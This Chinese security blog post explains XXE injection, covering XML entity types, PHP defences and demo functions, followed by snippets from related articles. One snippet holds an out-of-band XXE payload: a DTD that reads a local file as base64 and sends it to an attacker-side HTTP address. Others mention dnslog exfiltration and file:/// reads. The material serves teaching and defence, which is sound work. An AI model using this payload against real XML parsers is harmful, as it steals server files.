网络安全-XXE(XML External Entity)漏洞

已于 2024-10-31 15:16:20 修改
阅读量1.5k 收藏
点赞数 1
分类专栏: XXE 文章标签: 网络安全 xml html5 php
于 2021-10-04 10:55:28 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_26792141/article/details/120601458
版权

  • 1、原理

    执行XML文件外部实体包含的恶意链接信息,可导致读取任意文件、执行系统命令、探测内网端口、攻击内网网站等危害。
    xml文件是一种信息传输和存储的文本,HTML 是用来展示数据的。
    XML有自己的语法结构,其中实体就是其中一个特性,实体是一个预先定义的数据或数据集合。有了实体类似一个变量可以定义关联其他数据之后,方便直接引用
    实体分为三类:普通实体与参数实体、内部实体与外部实体、已解析实体与未解析实体。根据实体内容和DTD包含关系分为内部实体和外部实体
    内部实体:定义一个内部实体变量它的引用内容已经在当前DTD文件内存在
    外部实体:定义一个实体变量它的内容不在当前DTD内通过URI引用

  • 2. 防御

   2.1 可以通过禁用实体关闭实体解析开关(如PHP函数关闭 libxml_disable_entity_loader(true))
   2.2过滤用户提交的xml数据(关键字system和public)

  • 3、演示

3.1、php自带函数xml解析执行函数 simplexml_load_string,可以 读取某地xml文件和执行,

3.2、 php自带文件创建函数file_put_contents ,传入文件内容和文件名字可以创建文件

XXEXML外部实体注入)漏洞
weixin_45253622的博客
03-26 541
XXE:“xml external entity injection” 漏洞原理 XXE(XMLExternal Entity Injection)也就是XML外部实体注入,XXE漏洞发生在应用程序解析XML输入时,XML文件的解析依赖libxml库,而libxml2.9以前的版本默认支持并开启了对外部实体的引用,服务端解析用户提交的XML文件时,未对XML文件引用的外部实体(含外部一般实体和外部参数实体)做合适的处理,并且实体的URL支持file://和ftp://等协议,导致可加载恶意外部文件和代码,造
Xml DTD校验中关于external entity的实现策略。
dengyunze
04-18 2911
Xml parser的实现中,DTD的实现是一个比较麻烦的地方。麻烦之处不在于DTD的逻辑部分,而在于如何处理DTD的外部Entity,比如,DTD文件间的相互调用。比如如下的DTD声明:%imported-file;上面两段DTD语句,首先声明一个参数化的external Entity, 紧接着引用该external entity,表示导入该DTD文件作为整个DTD的一部分。那么,当Xml P
WebGoat (A4) XML External Entities (XXE)
箭雨镜屋
03-15 2752
第4页 这题要求用XXE注入罗列系统根目录。 首先在上图的输入框输入个评论,比如cute,按submit提交。 到burpsuite的proxy模块找到相关request报文,鼠标右键--send to repeater 从上图可见,<text></text>标签之前的内容是会显示在评论区的,因此如果在此处引用外部实体,外部实体的内容也是可以显示在评论区的。 在request报文中的xml代码中增加DTD,并在其中定义外部实体root,其内容是"file:///",
XXE漏洞详解
xcxhzjl的博客
11-18 2912
目录 一、XML基础 二、实体的分类 1、命名实体 2、字符实体 3、参数实体 4、外部实体 三、XXE漏洞 1、XXE漏洞发生在哪里 2、怎么判断网站存在XXE漏洞 3、XXE漏洞的危害 4、怎样构建XXE漏洞 5XXE漏洞的防御 参考资料 XXE漏洞即外部实体注入攻击(XML External Entity)。 一、XML基础 XML(eXtensible Markup Language)是一种结构性标记语言,在格式上类似于HTML。可用来标记数据,定义...
【每天学习一点新知识】XXEXML外部实体注入)从入门到放弃
RexHa的博客
10-29 2257
XML 指可扩展标记语言(EXtensibleMarkupLanguage)XML 是一种标记语言,很类似 HTMLXML 的设计宗旨是传输数据,而非显示数据XML 标签没有被预定义。您需要自行定义标签。XML 被设计为具有自我描述性。XML 是W3C 的推荐标准XML——XML介绍和基本语法_KLeonard的博客-优快云博客_xml本文介绍了XML语言的历史,以及它的作用和常见的应用。重点介绍了XML文件的语法规则。
XXE全称XML External Entity Injection漏洞.pdf
07-05
XXE全称XML External Entity Injection漏洞,是一种在应用程序解析XML输入时由于未能禁止外部实体加载而引发的安全漏洞。该漏洞可以被利用来执行文件读取、命令执行、内网端口扫描等多种攻击。 XML(eXtensible ...
网络安全-XXEXML外部实体注入)原理、攻击及防御_c# 如何防止xml外部实体注入
2401_84266286的博客
05-04 708
XML外部实体注入(XML External Entity,为什么不取首字母呢…),简称XXE漏洞
Xxe外部实体注入(XML External Entity Injection)
xuyunpeng3189的博客
01-23 1240
无回显的xxe怎么利用 (1)使用dnslog平台进行数据外带 (2)构造远程dtd文件造成文件外泄 Xxe详细防御方法 禁用外部实体 这是防范最为严格的手段,从前面的学习我们已经知道XXE的全部利用手段基础都来源于外部实体的注入, 也就是如果禁用了外部实体,那么XXE的所有攻击手段都将失效,无法再正常利用。 代码层禁用 PHP: libxml_disable_entity_loader(true); JAVA: DocumentBuilderFactory dbf =DocumentBuil
XML external entity (XXE) injection
最新发布
qq_52579508的博客
07-17 898
burpsuit 靶场的 xxe
XXE注入--XML外部实体注入(XML External Entity)
热门推荐
u011215939的博客
05-19 1万+
前言 很早就听说过这个漏洞,但是在实际的环境中很少遇见,最近碰到过XXE注入漏洞,于是就来研究一下XXE注入。 XXE Injection即XML External Entity Injection,也就是XML外部实体注入攻击.漏洞是在对非安全的外部实体数据进⾏行处理时引发的安全问题 XML知识 XML用于标记电子文件使其具有结构性的标记语言,可以用来标记数据、定义...
xml外部实体攻击
07-17
xml外部实体使用,漏洞产生原因,详细举例攻击原理,修复方法等
PortSwigger Academy | XML external entity (XXE) injection : XML外部实体注入
水榭山寺花烂漫,凤凰集外雁归来。敢与云峰争秀色,妙雨莲花九重开。
02-01 1585
文章目录什么是XML外部实体注入?XXE漏洞如何产生?XML实体什么是XML?什么是XML实体?什么是文件类型定义?什么是XML自定义实体?什么是XML外部实体?XXE攻击有哪些类型? 在本节中,我们将解释什么是XML外部实体注入,描述一些常见的示例,解释如何发现和利用各种XXE注入,并总结如何防止XXE注入攻击。 什么是XML外部实体注入? XML外部实体注入(也称为XXE)是一个网络安全漏洞,它使攻击者能够干扰应用程序对XML数据的处理。 它通常使攻击者可以查看应用程序服务器文件系统上的文件,并与应用程
XML External Entities 攻击(XML外部实体注入)
weixin_45352161的博客
05-17 3693
使用配置的 XML 解析器无法预防和限制外部实体进行解析,这会使解析器暴露在 XML External Entities 攻击 之下 说明: XML External Entities 攻击可利用能够在处理时动态构建文档的 XML 功能。XML 实体可动态包含来自给定资 源的数据。外部实体允许 XML 文档包含来自外部 URI 的数据。除非另行配置,否则外部实体会迫使 XML 解 析器访问由 URI 指定的资源,例如位于本地计算机或远程系统上的某个文件。这一行为会将应用程序暴露给 XM
webgoat- XML External Entity-XXE-XML实体注入
seanyang_的博客
11-01 1214
XML 外部实体攻击是针对解析 XML 输入的应用程序的一种攻击。当包含对外部实体的引用的 XML 输入由配置较弱的 XML 解析器处理时,就会发生此攻击。这种攻击可能会导致机密数据泄露、拒绝服务、服务器端请求伪造、从解析器所在机器的角度进行端口扫描以及其他系统影响。攻击可能包括使用 file: 方案或系统标识符中的相对路径来泄露本地文件,其中可能包含密码或私人用户数据等敏感数据。
[轉]XXE(XML External Entity attack)XML外部实体注入攻击
03-26 485
原文地址:https://www.freebuf.com/column/181064.html 作者:i春秋学院 References:https://gist.github.com/AlainODea/1779a7c6a26a5c135280bc9b3b71868fhttps://github.com/OWASP/CheatSheetSeries/blob/master/cheatshee...
xml外部实体注入(XXE
songbai220
12-10 375
XXE(xml外部实体注入) XML External Entity XXE介绍 XXE原理 建立*.dtd <!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=file:///c:/1.txt"> <!ENTITY % int "<!ENTITY % send SYSTEM 'http://192.168.0.105:8080?p=%file;'>"> 运维人
XXE 基础原理(XML external entity)
飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘
02-23 2968
XXE 基本原理(XML external entity) 文章目录XXE 基本原理(XML external entity)什么是XML外部实体 (XXE) 注入?什么是 XML?什么是 DTD什么是 XML 外部实体?案例分析pikachu xxe外部实体利用 XXE 检索文件利用 XXE 执行 SSRF 攻击带外交互的盲 XXE利用盲 XXE 使用恶意外部 DTD 窃取数据 什么是XML外部实体 (XXE) 注入? XML 外部实体是一种自定义 XML 实体,其定义的值是从声明它们的 DTD 外部加载
XXE: XML eXternal Entity Injection vulnerabilities
weixin_30791095的博客
01-06 322
From:https://www.gracefulsecurity.com/xml-external-entity-injection-xxe-vulnerabilities/ Here’s a quick write-up on XXE, starting with how to detect the vulnerability and moving on to how to fix it...
网络安全XXE--XML外部实体注入
边缘拼命划水的小陈
04-24 1406
XML外部实体注入(XML EXTERNAL ENTITY)简称XXE漏洞,概括一下就是"攻击者通过向服务器注入指定的xml实体内容,从而让服务器按照指定的配置进行执行,导致问题"也就是说服务端接收和解析了来自用户端的xml数据,而又没有做严格的安全控制,从而导致xml外部实体注入。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值